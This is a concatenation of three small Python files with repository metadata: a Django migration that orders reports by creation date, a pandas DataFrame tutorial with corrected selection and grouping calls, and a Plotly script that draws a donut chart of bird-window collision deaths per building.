# Generated by Django 2.2.7 on 2019-12-08 22:21 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('reports', '0005_auto_20191209_0120'), ] operations = [ migrations.AlterModelOptions( name='report', options={'ordering': ('-created',)}, ), ]
[ "menesbaysan@gmail.com" ]
menesbaysan@gmail.com
7be5aa773f2e343fd4b8b491a4269fdf9fff5719
ca609a94fd8ab33cc6606b7b93f3b3ef201813fb
/2017-feb/1.python/5.data-frames.py
959658216b9ad8cb6baf46f1063d69277bcff50f
[]
no_license
rajesh2win/datascience
fbc87def2a031f83ffceb4b8d7bbc31e8b2397b2
27aca9a6c6dcae3800fabdca4e3d76bd47d933e6
refs/heads/master
2021-01-20T21:06:12.488996
2017-08-01T04:39:07
2017-08-01T04:39:07
101,746,310
1
0
null
2017-08-29T09:53:49
2017-08-29T09:53:49
null
UTF-8
Python
false
false
726
py
# Pandas DataFrame walkthrough: creation, inspection, selection, filtering,
# slicing, and grouping.
import pandas as pd

col1 = [10, 20, 30, 40]
col2 = ['abc', 'def', 'xyz', 'pqr']
col3 = [0, 0, 0, 0]

# creating data frame
df1 = pd.DataFrame({'pid': col1, 'pname': col2, 'survived': col3})
df1.shape
df1.info()
df1.describe()
df1.head(2)
df1.tail()

# add a constant-valued column
df1['col4'] = 0

# access frame content by column/columns
df1.pid
df1['pid']
df1[['pid', 'pname']]
# fix: df1[[0, 1]] treats 0/1 as column *labels* and raises KeyError on
# string-labelled columns; use iloc for positional column selection.
df1.iloc[:, [0, 1]]

# dropping a column (fix: axis must be a keyword since pandas 2.0)
df2 = df1.drop('survived', axis=1)

# slicing rows of frame
df1[0:2]
df1[0:4]
df1[0:]
df1[:2]
df1[-2:]

# filtering rows of dataframe by condition
type(df1.pid > 20)
df1[df1.pid > 20]

# selecting subsets of rows and columns
df1.iloc[0:2, ]
df1.iloc[[0, 2], ]
df1.iloc[0:2, 0]
df1.iloc[0:2, [0, 2]]
df1.loc[0:2, ['pname']]

# grouping data in data frames (fix: the key column is 'pid', not 'id')
df1.groupby('pid').size()
[ "info@algorithmica.co.in" ]
info@algorithmica.co.in
c0300915f88b4cbb234193be8a08ceb789f7fd55
c24b28c0dc4ad8f83845f4c61882f1e04d49b5cd
/Plotly_Graphs/Plotly_Introduction/plotly_charts.py
d17cd6a9de3a549f8ebb82ff2712db48bbb76398
[]
no_license
Coding-with-Adam/Dash-by-Plotly
759e927759513d96060a770b1e0b0a66db13f54f
9f178f1d52536efd33827758b741acc4039d8d9b
refs/heads/master
2023-08-31T17:23:02.029281
2023-08-08T05:12:50
2023-08-08T05:12:50
234,687,337
1,293
1,822
null
2023-07-31T15:47:07
2020-01-18T05:36:28
Jupyter Notebook
UTF-8
Python
false
false
370
py
import pandas as pd
import plotly.express as px

# Bird/window collision data; by the usage below it must contain the
# columns 'Deaths', 'Bldg #', and 'Side'.
dfb = pd.read_csv("bird-window-collision-death.csv")
# NOTE(review): loaded but never used below — dead code? Confirm before removing.
df = px.data.tips()

# Donut chart (hole=0.3) of deaths per building, slices coloured by side.
fig = px.pie(dfb, values='Deaths', names='Bldg #', color="Side", hole=0.3)
# Show label + percentage on each slice; white text for inside-slice labels.
fig.update_traces(textinfo="label+percent", insidetextfont=dict(color="white"))
# Disable the toggle behaviour when a legend item is clicked.
fig.update_layout(legend={"itemclick":False})
fig.show()

fig.write_image("images/fig1.png")
[ "noreply@github.com" ]
noreply@github.com